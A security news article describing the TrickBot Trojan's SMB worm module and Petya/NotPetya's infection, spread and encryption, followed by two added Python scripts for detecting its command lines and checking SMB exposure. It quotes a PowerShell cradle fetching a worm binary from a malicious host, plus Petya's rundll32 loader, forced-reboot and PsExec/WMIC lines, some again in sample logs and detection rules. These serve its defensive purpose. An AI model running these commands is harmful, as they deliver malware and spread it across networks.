Banking Trojan TrickBot uses self-spreading like WannaCry

Security researchers have discovered a group of cyber criminals that is attempting to give its banking Trojan TrickBot the self-spreading, worm-like capabilities that made the recent ransomware attacks go worldwide.

The new version of the credential-stealing TrickBot banking Trojan, known as “1000029” (v24), has been found using the Windows Server Message Block (SMB) protocol, the same vector that allowed WannaCry and Petya to spread across the world so quickly.

TrickBot is a banking Trojan malware that has been targeting financial institutions across the world since last year.

The Trojan generally spreads via email attachments impersonating invoices from a large, unnamed “international financial institution,” which actually lead victims to a fake login page used to steal credentials.

Researchers at Flashpoint have discovered that the TrickBot gang appears to be testing a worm-like propagation module that spreads locally via Server Message Block (SMB), scans domains for lists of servers via the NetServerEnum Windows API, and enumerates other computers via Lightweight Directory Access Protocol (LDAP) enumeration.

The new TrickBot variant can also be disguised as ‘setup.exe’ and delivered through a PowerShell script to spread through interprocess communication and download an additional copy of TrickBot onto shared drives.

TrickBot’s “MachineFinder” and “netscan” functions appear to leverage the following techniques:

• NetServerEnum enumeration function
• LDAP enumeration

More specifically, the malware appears to enumerate all computers that are not domain controllers and resolve their names to IP addresses via the gethostbyname and inet_ntoa Windows APIs.

The malware appears to leverage the IPC$ (interprocess communication) share to propagate and execute a PowerShell script as the final payload, which downloads another copy of TrickBot, masked as “setup[.]exe,” into the shared drive.

The following PowerShell script was observed in the worm module:

powershell -Command "(New-Object Net.WebClient).DownloadFile('hxxp://c93211do[.]beget[.]tech/worm[.]bin[.]exe', 'setup[.]exe')"

To safeguard against such malware infections, always be suspicious of unsolicited files and documents sent by email, never click on links inside them without first verifying the source, and make sure you run an effective, up-to-date anti-virus security suite on your system.

Petya Ransomware hits the Globe


On 27 June, a nasty piece of ransomware (since reclassified as wiper malware) struck the globe, barely two months after the previous ransomware outbreak, WannaCry. The Petya ransomware (now known as NotPetya) attacks, which began infecting computers in several countries, including Russia, Ukraine, France, India and the United States, on Tuesday and demanded a $300 ransom, were not designed with the intention of restoring the computers at all. The malware was designed to look like ransomware but was in fact a wiper that destroys the targeted systems outright, wiping out all records on them. The email address used to receive the Bitcoin payments has been shut down, so even if the ransom is paid, the files will not be recovered.

Similar to WannaCry, Petya uses the EternalBlue exploit as one of the means to propagate itself. However, it also uses classic SMB network spreading techniques, meaning that it can spread within organizations even if they have patched against EternalBlue.

It has been confirmed that MEDoc, a tax and accounting software package, is used for the initial insertion of Petya into corporate networks. MEDoc is widely used in Ukraine, indicating that organizations in that country were the primary target.

After gaining an initial foothold, Petya then uses a variety of methods to spread across corporate networks.

What makes it dangerous? Unlike other ransomware, it encrypts the Master File Table (MFT) of NTFS partitions. Each file on an NTFS volume is represented by a record in a special file called the master file table (MFT); if the MFT is corrupted, the file system structure on the disk becomes unusable. It also overwrites the Master Boot Record (MBR) with a custom bootloader that shows a ransom note and prevents the victim from booting their computer. This means that once a machine is infected it is in a complete state of lockdown, which makes it far more intrusive. In comparison, the WannaCry ransomware targeted only specific file extensions while still allowing access to the operating system.

INFECTION AND INSTALLATION

According to Symantec, Petya is initially executed via rundll32.exe using the following command:

  • rundll32.exe perfc.dat

Once the DLL has been loaded, it will first attempt to remove itself from the infected system. This is done by opening the file and overwriting its contents with null bytes before finally deleting the file from disk. Overwriting the file with null bytes is used as an attempt to thwart recovery of the file using forensic techniques.

Next, it attempts to create the following file to be used as a flag indicating that the computer has been infected:

  • C:\Windows\perfc

Once installed, Petya proceeds to modify the master boot record (MBR). This allows it to hijack the normal loading process of the infected computer during the next system reboot. The modified MBR is used to encrypt the hard disk while simulating a CHKDSK screen. It then displays a ransom note to the user.

MBR modification does not succeed if the threat is executed as a normal user, but the threat will still attempt to spread across the network.

At this point, a system reboot is scheduled using the following command:

  • "/c at 00:49 C:\Windows\system32\shutdown.exe /r /f"

By scheduling the reboot rather than forcing it immediately, the malware gives itself time to spread to other computers in the network before user-mode encryption occurs.

Once Petya does get into a local network, however, there are several concurrent mechanisms for it to spread to further local machines. The first and foremost is the ETERNALBLUE exploit. The next mechanism is to use a Mimikatz-like tool to dump credentials and then use those credentials to run itself on other computers in the local LAN using either PsExec or wmic.exe.

The malware follows these four steps to spread itself:

  1. Tries to find credentials:
    • Method 1: Uses a custom tool to extract credentials from memory (the code shares similarities with Mimikatz and accesses the Windows LSASS process)
    • Method 2: Steals credentials from the credential store on the infected system
  2. Makes an inventory of the local network for other machines. For each machine found, it checks whether port 139 or 445 is open
  3. Checks via WebDAV whether the enumerated systems have already been infected. If not, it transfers the malware to those systems via SMB
  4. Uses PsExec or WMI tools to remotely execute the malware
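The command lines quoted in this article (the PowerShell download cradle, the rundll32.exe perfc.dat loader, the scheduled shutdown.exe reboot, and PsExec/WMIC remote execution) are all visible in process-creation telemetry. The following script is an added example, not code from the article or from any of the vendors it cites: it runs a small set of regex rules over constructed sample log records shaped like Sysmon Event ID 1 / Windows 4688 fields (host, user, image, command line). The host names, user names, and URL in the sample are placeholders constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample process-creation records (not real telemetry). Each line is
# "<host>|<user>|<image path>|<command line>", the fields a Sysmon Event ID 1 or
# Windows Security 4688 event carries. Hosts, users and the URL are placeholders.
SAMPLE_LOG = r"""
WS01|alice|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -Command "(New-Object Net.WebClient).DownloadFile('hxxp://example.invalid/worm.bin.exe', 'setup.exe')"
WS01|alice|C:\Windows\System32\rundll32.exe|rundll32.exe perfc.dat
WS01|SYSTEM|C:\Windows\System32\cmd.exe|cmd.exe /c at 00:49 C:\Windows\system32\shutdown.exe /r /f
WS02|alice|C:\Tools\psexec.exe|psexec.exe \\WS03 -u corp\alice -p ***** -d C:\Windows\perfc.dat
WS02|alice|C:\Windows\System32\wbem\WMIC.exe|wmic /node:WS04 /user:corp\alice process call create "rundll32 C:\Windows\perfc.dat"
WS05|bob|C:\Windows\System32\notepad.exe|notepad.exe C:\Users\bob\notes.txt
WS05|bob|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -Command "Get-Process"
"""

# Detection rules: (rule name, regex over the command line). Each mirrors one
# behaviour described in the article; all are matched case-insensitively.
RULES = [
    # PowerShell WebClient download cradle, as in the TrickBot worm module
    ("powershell_download_cradle",
     re.compile(r"new-object\s+(?:system\.)?net\.webclient.*?\.downloadfile\s*\(", re.I)),
    # Petya loader: rundll32 as the image, perfc.dat as its argument
    ("rundll32_perfc_dat",
     re.compile(r'^\s*"?(?:.*\\)?rundll32(?:\.exe)?"?\s+.*perfc\.dat', re.I)),
    # Scheduled forced reboot via the "at" scheduler and shutdown.exe /r
    ("scheduled_forced_reboot",
     re.compile(r"\bat\s+\d{1,2}:\d{2}\b.*shutdown(?:\.exe)?\s+.*?/r\b", re.I)),
    # Remote execution tooling used for lateral movement
    ("remote_exec_psexec_wmic",
     re.compile(r"(?:psexec(?:\.exe)?\s+\\\\|wmic(?:\.exe)?\s+.*?/node:)", re.I)),
]


@dataclass(frozen=True)
class Alert:
    host: str
    user: str
    rule: str
    cmdline: str


def parse_record(line: str):
    """Split one log record into its four fields; None for blank or malformed lines."""
    parts = line.split("|", 3)
    if len(parts) != 4:
        return None
    host, user, image, cmdline = (p.strip() for p in parts)
    return {"host": host, "user": user, "image": image, "cmdline": cmdline}


def detect(log_text: str) -> List[Alert]:
    """Run every rule over every record; one Alert per (record, matching rule)."""
    alerts: List[Alert] = []
    for raw in log_text.splitlines():
        rec = parse_record(raw)
        if rec is None:
            continue
        for name, pattern in RULES:
            if pattern.search(rec["cmdline"]):
                alerts.append(Alert(rec["host"], rec["user"], name, rec["cmdline"]))
    return alerts


def rules_by_host(alerts: List[Alert]) -> Dict[str, List[str]]:
    """Collapse alerts to the sorted, de-duplicated rule names seen on each host."""
    seen: Dict[str, set] = {}
    for a in alerts:
        seen.setdefault(a.host, set()).add(a.rule)
    return {h: sorted(r) for h, r in seen.items()}


def hosts_needing_isolation(alerts: List[Alert]) -> List[str]:
    """Hosts showing the loader/reboot chain or remote execution tooling: candidates
    for network isolation before the scheduled reboot fires."""
    serious = {"rundll32_perfc_dat", "scheduled_forced_reboot", "remote_exec_psexec_wmic"}
    return sorted(h for h, rules in rules_by_host(alerts).items() if serious & set(rules))


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for a in found:
        print(f"[{a.rule}] {a.host} ({a.user}): {a.cmdline}")
    print("isolate:", hosts_needing_isolation(found))
```

On the sample data WS01 trips the download-cradle, loader and scheduled-reboot rules and WS02 trips the remote-execution rule; the notepad and Get-Process lines produce nothing. The rundll32 rule is anchored to the start of the command line on purpose, so the `rundll32` nested inside the WMIC `process call create` argument is attributed to the remote-execution rule rather than counted twice.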

Once spreading has occurred, Petya then lists all files on any fixed drive (e.g. C:\) and checks for any of the following file extensions (skipping the %Windir% directory of that drive):

.3ds .7z .accdb .ai .asp .aspx .avhd .back .bak .c .cfg .conf .cpp .cs .ctl .dbf .disk .djvu .doc .docx .dwg .eml .fdb .gz .h .hdd .kdbx .mail .mdb .msg .nrg .ora .ost .ova .ovf .pdf .php .pmf .ppt .pptx .pst .pvi .py .pyc .rar .rtf .sln .sql .tar .vbox .vbs .vcb .vdi .vfd .vmc .vmdk .vmsd .vmx .vsdx .vsv .work .xls .xlsx .xvd .zip

A 128-bit AES key is generated for each drive. If a file’s extension matches one in the above list, the malware encrypts the first 1MB of the file using the generated key.

After encrypting all eligible files, the threat will generate the ransom note and write it to a “README.TXT” file in the current drive.

The generated AES key(s) are then encrypted using an embedded public key.

The resulting encrypted blob is then appended to the end of the ransom note (README.TXT) as a Base64 encoded string. The ransom note refers to this as the “installation key”.

The generated key is then destroyed to ensure it cannot be retrieved from memory.

At this point, the system is rebooted and the modified MBR code loads the simulated CHKDSK screen and full disk encryption occurs.

PREVENTION

Checking whether you are at risk from this attack involves multiple actions, because the attack itself uses different methods to propagate within networks. The following actions can be performed to identify potentially vulnerable machines within the network:

  • Perform a network port scan to identify systems on which TCP ports 139 and 445 are open. The more machines that are reachable on these ports, the greater the risk of the attack spreading to large numbers of systems within the network.
  • Perform a vulnerability scan to identify machines that are missing the MS17-010 (and the KB2871997) patch. If the patches are missing, the identified systems are vulnerable to one of the spreading and infection methods used by the malware.
  • Create the file C:\Windows\perfc beforehand, so that the malware’s infection-marker check finds it already present.
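The following script is an added example, not code from the article or from any vendor it cites, covering the first and third prevention steps above: it probes a list of hosts for open TCP 139/445 and creates the perfc marker file read-only if it is absent. The patch check (MS17-010 / KB2871997) needs a real vulnerability scanner and is not attempted here. The `probe` parameter is an assumption of this example so the scan logic can be exercised without a live network; the host addresses in the `__main__` block are placeholders.

```python
import os
import socket
import sys
import tempfile
from typing import Callable, Dict, Iterable, List, Tuple

# NetBIOS session and SMB ports named in the article's first prevention step.
SMB_PORTS: Tuple[int, ...] = (139, 445)


def tcp_probe(host: str, port: int, timeout: float = 0.5) -> bool:
    """True if a TCP connection to host:port completes within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def scan_hosts(hosts: Iterable[str], ports: Tuple[int, ...] = SMB_PORTS,
               probe: Callable[[str, int], bool] = tcp_probe) -> Dict[str, List[int]]:
    """Map each host to the SMB/NetBIOS ports that accept connections.

    `probe` is injectable (an assumption of this example) so the logic can be
    tested offline; in real use the default tcp_probe is used."""
    exposure: Dict[str, List[int]] = {}
    for host in hosts:
        open_ports = [p for p in ports if probe(host, p)]
        if open_ports:
            exposure[host] = open_ports
    return exposure


def exposure_report(exposure: Dict[str, List[int]], total_hosts: int) -> List[str]:
    """Human-readable lines: one per exposed host plus a summary of the ratio."""
    lines = [f"{host}: ports {', '.join(map(str, ports))} open"
             for host, ports in sorted(exposure.items())]
    lines.append(f"{len(exposure)} of {total_hosts} hosts reachable on SMB/NetBIOS ports")
    return lines


def ensure_marker(windir: str, name: str = "perfc") -> bool:
    """Create the infection-marker file (C:\\Windows\\perfc on a real system) if it
    is absent and make it read-only. Returns True if created now, False if it
    already existed, so repeated runs are safe."""
    path = os.path.join(windir, name)
    if os.path.exists(path):
        return False
    with open(path, "wb"):
        pass  # zero-length file is enough: only its existence is checked
    os.chmod(path, 0o444)
    return True


def demo_marker() -> Dict[str, bool]:
    """Exercise ensure_marker against a temporary directory standing in for
    %Windir%, then clean up. Returns the observed behaviour for checking."""
    windir = tempfile.mkdtemp()
    path = os.path.join(windir, "perfc")
    created_first = ensure_marker(windir)
    created_second = ensure_marker(windir)
    exists = os.path.isfile(path)
    os.chmod(path, 0o644)
    os.remove(path)
    os.rmdir(windir)
    return {"created": created_first, "already_present": not created_second, "exists": exists}


if __name__ == "__main__":
    # Placeholder targets; pass real hosts as arguments. The marker is written
    # to %SystemRoot% only when that variable is set (i.e. on Windows).
    targets = sys.argv[1:] or ["192.0.2.10", "192.0.2.11"]
    for line in exposure_report(scan_hosts(targets), len(targets)):
        print(line)
    windir = os.environ.get("SystemRoot")
    if windir:
        print("perfc marker created" if ensure_marker(windir) else "perfc marker already present")
```

Run it with the addresses of the subnet you manage as arguments; hosts that accept connections on 139 or 445 are the ones to prioritise for patching and segmentation. The marker step is a stop-gap, not a fix: it only affects the infection-flag check and does nothing against the credential-theft and remote-execution paths.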